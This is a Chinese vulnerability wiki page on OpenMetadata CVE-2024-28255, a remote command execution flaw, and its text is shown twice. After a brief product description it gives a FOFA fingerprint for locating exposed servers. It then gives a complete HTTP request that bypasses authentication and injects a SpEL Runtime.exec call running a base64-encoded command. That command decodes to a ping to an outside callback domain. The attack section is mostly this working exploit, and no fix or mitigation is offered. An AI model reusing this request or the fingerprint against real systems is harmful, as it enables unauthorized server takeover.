fofamini-wiki

登录白背景

源码

OpenMetadata CVE-2024-28255 命令执行漏洞

一、漏洞简介

OpenMetadata是一个用于数据治理的一体化平台，可以帮助我们发现，协作，并正确的获取数据。其提供了数据发现、数据血缘、数据质量、数据探查、数据治理和团队协作的一体化平台。它是发展最快的开源项目之一，拥有充满活力的社区，并被各行业垂直领域的众多公司采用。 OpenMetadata 由基于开放元数据标准和API 的集中式元数据存储提供支持，支持各种数据服务的连接器，可实现端到端元数据管理，让您可以自由地释放数据资产的价值。其condition接口存在CVE-2024-28255远程命令执行漏洞，可被攻击者接管服务器。

二、影响版本

OpenMetadata

三、资产测绘

fofaicon_hash="733091897"
特征

四、漏洞复现

执行的命令需base64编码

GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22cGluZyB3YnJ6ZmtxamN5LmRncmgzLmNu%22))) HTTP/1.1
Host: 
User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Connection: close

原文: https://www.yuque.com/xiaokp7/ocvun2/pz2p78tho923aukc

# OpenMetadata CVE-2024-28255 命令执行漏洞

# 一、漏洞简介
OpenMetadata是一个用于数据治理的一体化平台，可以帮助我们发现，协作，并正确的获取数据。其提供了数据发现、数据血缘、数据质量、数据探查、数据治理和团队协作的一体化平台。它是发展最快的开源项目之一，拥有充满活力的社区，并被各行业垂直领域的众多公司采用。 OpenMetadata 由基于开放元数据标准和API 的集中式元数据存储提供支持，支持各种数据服务的连接器，可实现端到端元数据管理，让您可以自由地释放数据资产的价值。其condition接口存在CVE-2024-28255远程命令执行漏洞，可被攻击者接管服务器。

# 二、影响版本

- OpenMetadata

# 三、资产测绘

- fofa`icon_hash="733091897"`
- 特征

![image.png](./img/sj9XAYKGaL4hMSo3/1714216467929-a292c9d9-b9e2-44ff-9e43-9b167be9754a-981681.png)

# 四、漏洞复现
执行的命令需base64编码
```
GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22cGluZyB3YnJ6ZmtxamN5LmRncmgzLmNu%22))) HTTP/1.1
Host: 
User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Connection: close
```
![image.png](./img/sj9XAYKGaL4hMSo3/1714216506355-e0737ddc-db9a-46fd-a0e8-7de860167cb0-584784.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pz2p78tho923aukc>